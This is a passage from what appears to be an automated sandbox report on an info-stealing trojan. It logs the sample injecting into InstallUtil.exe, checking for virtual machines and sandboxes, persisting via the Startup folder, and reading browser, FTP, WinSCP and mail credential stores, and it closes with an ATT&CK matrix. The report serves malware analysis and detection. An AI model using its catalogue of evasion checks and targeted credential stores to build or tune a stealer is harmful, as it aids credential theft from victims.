                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 43E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeWindow / User API: threadDelayed 362Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 3848Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 5012Thread sleep count: 111 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 5012Thread sleep count: 362 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5040Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2088Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6336Thread sleep count: 273 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6336Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5248Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1240Thread sleep count: 199 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.3377013006.0000000005E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Ref#1550238.exe, 00000000.00000002.2508714224.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2743053297.00000000064E7000.00000004.00000020.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2830392254.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1169008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A07008Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Users\user\Desktop\Ref#1550238.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3908, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3908, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3908, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Credentials in Registry
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      Security Account Manager1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Software Packing
                      NTDS311
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc Filesystem1
